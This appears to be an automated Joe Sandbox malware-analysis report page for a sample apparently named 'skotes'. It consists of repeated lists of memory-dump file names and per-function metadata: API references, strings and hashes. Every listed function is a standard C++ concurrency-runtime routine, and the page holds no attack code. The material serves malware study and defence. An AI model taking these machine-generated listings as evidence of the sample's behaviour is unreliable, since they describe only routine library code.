Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: 5f800e77477e93b9f1961586121baba554c673b61fed446476c831d8f3f348f3
Instruction ID: a8f4e492cd7cef2f60ebe2f271eb9727576cd0fc1685250f36ef395515cea7d2
Opcode Fuzzy Hash: 5f800e77477e93b9f1961586121baba554c673b61fed446476c831d8f3f348f3
Instruction Fuzzy Hash: AA31D036701200AFCB05DF54C885BADB7BAAF89304F148099E80A9B392DB74ED41CB92

Function 009786C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 009786EE

Part of subcall function 0096EAD0: _SpinWait.LIBCONCRT ref: 0096EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00978702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00978734
List.LIBCMT ref: 009787B7
List.LIBCMT ref: 009787C6

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: d597f69a7659d1ff07d1f851c97ec4167aed3019398dbfce537fad7efec0024a
Instruction ID: a1384763a81ccfaa3ffcf632bd535265c784be4c663078d70de793e2eb61a556
Opcode Fuzzy Hash: d597f69a7659d1ff07d1f851c97ec4167aed3019398dbfce537fad7efec0024a
Instruction Fuzzy Hash: 0A31BA33D41255DFCB18EFA8D5966EEBBB1BF84718F24806AD40A77642CB31AD04CB90

Function 0098182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 009818A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 009818EB

Strings

pContext, xrefs: 0098189C

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 6aabe7a995ad3027fc16c9f595e834b5f590260dfaa740f6c99042a65c81e5e4
Instruction ID: 39154dd1674f4682ad7fa28f684ae174aa54009dcc57ec34471d65dc38b79346
Opcode Fuzzy Hash: 6aabe7a995ad3027fc16c9f595e834b5f590260dfaa740f6c99042a65c81e5e4
Instruction Fuzzy Hash: E521B235B006159BCB18BB68D896BBDB3ADBFD5334B04052AE51187391DBA4E843CBD1

Function 0097AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 0097AEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0097AF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0097AF4E

Strings

pExecutionResource, xrefs: 0097AF07

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 795ee85c5d85f0d884ddbb1cf23dcf212efe1b048b10788cdd40a31eeb794170
Instruction ID: 11e17ff1c3f186ed6966e8362b12214b55ac53443f939a921be3498efaf2f16e
Opcode Fuzzy Hash: 795ee85c5d85f0d884ddbb1cf23dcf212efe1b048b10788cdd40a31eeb794170
Instruction Fuzzy Hash: 2721B4B1B413059BCF08EF64C952BADB7A5BFC8314F148029F505AB382DBB0AE01CB95

Function 00974EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00974F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00974F66

Strings

count, xrefs: 00974EBA
ppVirtualProcessorRoots, xrefs: 00974F1C

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
